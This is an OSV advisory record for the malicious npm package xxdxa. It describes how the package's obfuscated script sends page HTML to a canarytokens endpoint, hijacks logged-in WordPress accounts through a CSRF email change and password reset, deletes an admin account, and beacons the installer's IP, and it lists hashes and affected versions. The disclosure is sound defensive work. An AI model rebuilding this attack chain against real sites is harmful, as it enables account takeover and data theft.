MAL-2026-10752

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/xxdxa/MAL-2026-10752.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10752
Published
2026-07-16T18:36:36Z
Modified
2026-07-16T19:20:02.379207442Z
Summary
Malicious code in xxdxa (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (26a77171f4b68ff814a7a99b5e51e3d59b9d4ca41fefbd650d2a0f8412878360)

The package's sole file i.js (declared as main) is a heavily obfuscated IIFE whose top-level exploit() runs unconditionally when the module is loaded. In a browser context on noviembrenacional.com it reads document.documentElement.outerHTML, base64-encodes it, and POSTs it (body 'type=pagehtml&data=...') to a hardcoded canarytokens.com endpoint (canarytokens.com/images/terms/e63c36xvesfv8udb0yiy1xztu/contact.php), along with status beacons (start, username, nouserspan, nononce, exploitsuccess, error). When the visitor is a logged-in WordPress user on that site whose username is neither 'JuanCuesta' nor 'noviembrenacional', it fetches /my-account/editar-cuenta/, extracts the save-account-details nonce and referer, and submits a same-origin CSRF POST that overwrites the victim's account email to nyxalor25@proton.me, then triggers a password reset — an account takeover. For the 'noviembrenacional' admin user it instead POSTs to /members/<user>/settings/delete-account/. In Node (no window), the top-level call throws and the catch handler issues fetch(CANARY_URL + '?type=error&msg=...'), leaking a beacon (including the installer's public IP and an error string) to the attacker's canarytokens URL at require/import time. URLs, DOM property names, form field names, endpoints, and the attacker email are hidden via \uXXXX escapes, reversed-string decoding (e.g. '/srebmem/'.split('').reverse().join('') → '/members/'), and dead-code XOR expressions, existing solely to conceal the exfiltration destination and WordPress attack targets.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-010754",
            "sha256": "0419014b846dad93131788936a2a40257cb27b7c19ab4f74b43d84445b608afa",
            "import_time": "2026-07-16T18:54:02.912549687Z",
            "modified_time": "2026-07-16T18:42:34Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.3"
            ]
        },
        {
            "import_time": "2026-07-16T18:54:02.957475438Z",
            "sha256": "0aa8c7ef8c36ef3d4eb1f3c423ca518894ee4abd9c621232cf8d451a9e5d81f9",
            "modified_time": "2026-07-16T18:42:42Z",
            "versions": [
                "1.0.2"
            ],
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-010755"
        },
        {
            "modified_time": "2026-07-16T18:37:02Z",
            "sha256": "26a77171f4b68ff814a7a99b5e51e3d59b9d4ca41fefbd650d2a0f8412878360",
            "versions": [
                "1.0.4"
            ],
            "import_time": "2026-07-16T18:54:00.864358936Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-010717"
        },
        {
            "modified_time": "2026-07-16T18:36:55Z",
            "sha256": "4f93df3b1a546f25702b9d6d35590f05a6f86171cd9852085c2708b5f765242f",
            "versions": [
                "1.0.5"
            ],
            "import_time": "2026-07-16T18:54:00.832547735Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-010716"
        },
        {
            "versions": [
                "1.0.7"
            ],
            "sha256": "d9f7b472ce0efe03e1eb07b8756f06682c3289fb2b33f544edcd12f71d7e3e56",
            "import_time": "2026-07-16T18:54:00.732302137Z",
            "modified_time": "2026-07-16T18:36:36Z",
            "id": "IN-MAL-2026-010714",
            "source": "amazon-inspector"
        },
        {
            "modified_time": "2026-07-16T18:43:23Z",
            "sha256": "f8c8cc7d71b667ac9ab8421c504e75d408ec3354aa77d47d1287cb8c190a85e1",
            "versions": [
                "1.0.1"
            ],
            "import_time": "2026-07-16T18:54:03.149350522Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-010760"
        }
    ]
}
References
Credits

Affected packages

npm / xxdxa

Package

Affected ranges

Affected versions

1.*
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.7

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "xxdxa-1.0.3.tgz",
            "hashes": {
                "sha1": "ea9ba28fbc8f45f190bea59cdc61d69c5294e8f4",
                "sha512_sri": "sha512-mRPeE88aCaPu+/KZRm18Qd/oWk4QHtg0yiBAD4xeemvrFt2HRyxMtxs/zIeKollbn8fs8paQ0HsHTgYIHBIcrA=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "4c32d2a243779efec8755a049c35be1aecf888b50fd7d02a65073884cd7ebe04791269",
            "sha256": "6550221df675fe7a77bcfb4d34ca4bcbc8b13d73a76385b8d3b082765e3bbe46",
            "path": "i.js"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/xxdxa/MAL-2026-10752.json"